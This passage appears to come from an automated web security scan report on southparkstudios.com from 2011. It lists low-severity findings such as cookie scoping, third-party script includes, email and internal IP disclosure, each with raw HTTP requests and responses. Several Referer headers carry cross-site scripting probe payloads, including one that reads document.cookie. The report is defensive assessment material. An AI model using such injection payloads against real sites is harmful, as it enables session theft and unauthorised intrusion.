A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...

6. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.southparkstudios.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips/36043422f9a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3282301e834/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242714|session#1303242631302-17636#1303244514; s_nr=1303242653801; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fclips%25252F36043422f9a%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26479
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 19:50:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>
<script src="http://btg.mtvnservices.com/aria/coda.html?site=southparkstudios.com" type="text/javascript"></script>
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/&cmsPageId=351143" type="text/javascript"></script>
...[SNIP]...

6.2. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>
<script src="http://btg.mtvnservices.com/aria/coda.html?site=southparkstudios.com" type="text/javascript"></script>
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/account/login&cmsPageId=" type="text/javascript"></script>
...[SNIP]...

6.3. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clips/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 136520
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:46:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>
<script src="http://btg.mtvnservices.com/aria/coda.html?site=southparkstudios.com" type="text/javascript"></script>
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/clips/360434&cmsPageId=343750" type="text/javascript"></script>


<script src="http://activities.niagara.comedycentral.com/register/southpark/clips/360434" type="text/javascript"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.southparkstudios.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips/36043422f9a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3282301e834/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242714|session#1303242631302-17636#1303244514; s_nr=1303242653801; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fclips%25252F36043422f9a%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26479
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 19:50:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<a href="mailto:info@southparkstudios.com">
...[SNIP]...

7.2. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The following email address was disclosed in the response:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<a href="mailto:info@southparkstudios.com">
...[SNIP]...

7.3. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The following email address was disclosed in the response:

Request

GET /clips/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 136520
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:46:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<a href="mailto:info@southparkstudios.com">
...[SNIP]...

7.4. http://www.southparkstudios.com/layout/common/js/widgets/twitter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /layout/common/js/widgets/twitter.js

Issue detail

The following email address was disclosed in the response:

Request

GET /layout/common/js/widgets/twitter.js HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/css;charset=utf-8
Content-Length: 65206
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:49:49 GMT
Connection: close

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

8. Private IP addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


8.1. http://www.southparkstudios.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips/36043422f9a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3282301e834/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242714|session#1303242631302-17636#1303244514; s_nr=1303242653801; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fclips%25252F36043422f9a%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26479
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 19:50:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script type="text/javascript">
swfobject.embedSWF("http://www.southparkstudios.com/gsp/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf", "promo_373465_swf", "976", "100", "10.0.12.36", "/layout/common/swf/expressInstall.swf", {}, {"wmode":"opaque"}, {"id":"hpbanner"});
</script>
...[SNIP]...

8.2. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /clips/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 136520
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:46:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script type="text/javascript">
swfobject.embedSWF("http://media.mtvnservices.com/mgid:cms:item:southparkstudios.com:360434", "clips_player_swf", "480", "360", "10.0.12.36", "/layout/common/swf/expressInstall.swf", {"sid":"South_Park_Clips","autoPlay":"true","configParams":"nid=82125"}, {"bgcolor":"#000000","wmode":"opaque","allowScriptAccess":"always","allowFullScreen"
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.southparkstudios.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 76
Content-Type: text/plain
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:46:16 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.southparkstudios.com/sitemap.xml

10. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


10.1. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /layout/skin_v3/css/img/cmn/tabs_bg.gif

Request

GET /layout/skin_v3/css/img/cmn/tabs_bg.gif HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://forums.southparkstudios.com/forum/ucp.php?mode=register
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; southpark_u=1; southpark_username=Anonymous; southpark_sid=608cb90aa087ada1f5f6450eab76d9b5; southpark_k=; mbox=check#true#1303242733|session#1303242631302-17636#1303244533; s_nr=1303242672125; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 14
Content-Type: text/html
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:50:31 GMT
Connection: close

File Not Found

10.2. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

Request

GET /layout/skin_v3jq/css/img/upload/upload_logo_big.jpg HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/account/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA; southpark_u=1; southpark_username=Anonymous; southpark_sid=608cb90aa087ada1f5f6450eab76d9b5; southpark_k=

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 14
Content-Type: text/html
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close

File Not Found

11. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.southparkstudios.com
Path:   /layout/skin_v3/css/img/cmn/tabs_bg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /layout/skin_v3/css/img/cmn/tabs_bg.gif HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://forums.southparkstudios.com/forum/ucp.php?mode=register
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
